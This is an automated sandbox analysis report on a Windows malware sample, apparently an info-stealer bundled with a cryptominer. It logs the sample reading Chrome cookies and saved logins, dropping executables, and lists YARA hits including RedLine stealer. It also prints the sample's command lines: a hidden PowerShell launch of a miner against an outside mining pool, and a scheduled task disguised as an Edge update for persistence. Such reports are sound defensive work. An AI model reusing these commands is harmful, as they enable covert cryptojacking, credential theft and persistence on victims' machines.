__exception__ April 22, 2025, 11:55 a.m.	stacktrace: 0x6de70a0 0x6dea344 0x6de9b35 0x6de04ce 0x1f67bf7 0x1f628cd 0x1f624ae 0x1f6067f 0x1f60108 0x1f6009b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73f42652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73f5264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73f52e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x740074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x74007610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x74091dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x74091e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x74091f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7409416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x745ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74877f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74874de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6de70e3 registers.esp: 4844832 registers.edi: 4845080 registers.eax: 0 registers.ebp: 4844840 registers.edx: 0 registers.ebx: 4846468 registers.esi: 38169572 registers.ecx: 38176756	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Allocates read-write-execute memory (usually to unpack itself) (50 out of 246 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 region_size: 2097152 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000026a0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002820000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef28a1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2b1e000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2b1e000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2b1f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2b1f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2b1f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2b1f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2b1f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2b1f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2b1f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2b1f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2b20000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2b20000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2b20000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2b20000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2b20000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2b21000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2b21000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2b21000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2b21000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2b1e000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00032000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 region_size: 589824 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00022000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002822000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 region_size: 12288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002824000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000fa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00033000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00034000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00122000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000fd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00035000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00170000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00023000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00036000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00123000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000e3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff0002a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00037000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 22, 2025, 11:48 a.m.	process_identifier: 2632 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002827000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

Steals private information from local Internet browsers (7 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\lockfile
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State

Creates executable files on the filesystem (4 events)

file	C:\Users\test22\AppData\Local\Temp\SystemService\crypted.exe
file	C:\Users\test22\AppData\Local\Temp\SystemService\miner_loop.bat
file	C:\Users\test22\AppData\Local\Temp\SystemService\sysdrv.exe
file	C:\Users\test22\AppData\Local\Temp\SystemService\install.bat

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\SystemService\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	powershell -WindowStyle Hidden -Command "Start-Process -WindowStyle Hidden -FilePath 'C:\Users\test22\AppData\Local\Temp\SystemService\sysdrv.exe' -ArgumentList '--url pool.hashvault.pro:443 --user 82tLCbM64D89VX5zsHwjYpCu4WftAMF9AHzc5sd2ZLmHZBUZdwX6UJzEY1w4bwK5PhV4Tsh7kNUGXS8CynaTsvkADvcbvP6.TEST22-PC --pass x --donate-level 1 --tls --cpu-max-threads-hint=25'"
cmdline	C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\SystemService\miner_loop.bat
cmdline	schtasks /Create /F /SC ONLOGON /RL HIGHEST /TN "MicrosoftEdgeUpdate" /TR "\"C:\Users\test22\AppData\Roaming\SystemService\miner_loop.bat\"" /RU "test22"

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\SystemService\crypted.exe

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW April 22, 2025, 11:47 a.m.	thread_identifier: 2636 thread_handle: 0x000000000000006c process_identifier: 2632 current_directory: C:\Users\test22\AppData\Local\Temp\SystemService filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell -WindowStyle Hidden -Command "Start-Process -WindowStyle Hidden -FilePath 'C:\Users\test22\AppData\Local\Temp\SystemService\sysdrv.exe' -ArgumentList '--url pool.hashvault.pro:443 --user 82tLCbM64D89VX5zsHwjYpCu4WftAMF9AHzc5sd2ZLmHZBUZdwX6UJzEY1w4bwK5PhV4Tsh7kNUGXS8CynaTsvkADvcbvP6.TEST22-PC --pass x --donate-level 1 --tls --cpu-max-threads-hint=25'" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000068	1	1	0
ShellExecuteExW April 22, 2025, 11:48 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\SystemService\sysdrv.exe parameters: --url pool.hashvault.pro:443 --user 82tLCbM64D89VX5zsHwjYpCu4WftAMF9AHzc5sd2ZLmHZBUZdwX6UJzEY1w4bwK5PhV4Tsh7kNUGXS8CynaTsvkADvcbvP6.TEST22-PC --pass x --donate-level 1 --tls --cpu-max-threads-hint=25 filepath: C:\Users\test22\AppData\Local\Temp\SystemService\sysdrv.exe	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses April 22, 2025, 11:55 a.m.	flags: 14 family: 0		111	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW April 22, 2025, 11:48 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW April 22, 2025, 11:55 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (50 out of 63 events)

description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win
description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	RedLine stealer	rule	RedLine_Stealer_m_Zero
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl

Queries for potentially installed applications (50 out of 51 events)

Time & API	Arguments	Status
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000534 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: 7-Zip base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: AddressBook base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: Adobe AIR base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: Connection Manager base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: DirectDrawEx base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: EditPlus base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: Fontcore base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: Google Chrome base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: Haansoft HWord 80 Korean base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: IE40 base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: IE4Data base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: IE5BAKEX base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: IEData base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: MobileOptionPack base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: Mozilla Thunderbird 78.4.0 (x86 ko) base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: Office15.PROPLUSR base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: SchedulingAgent base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
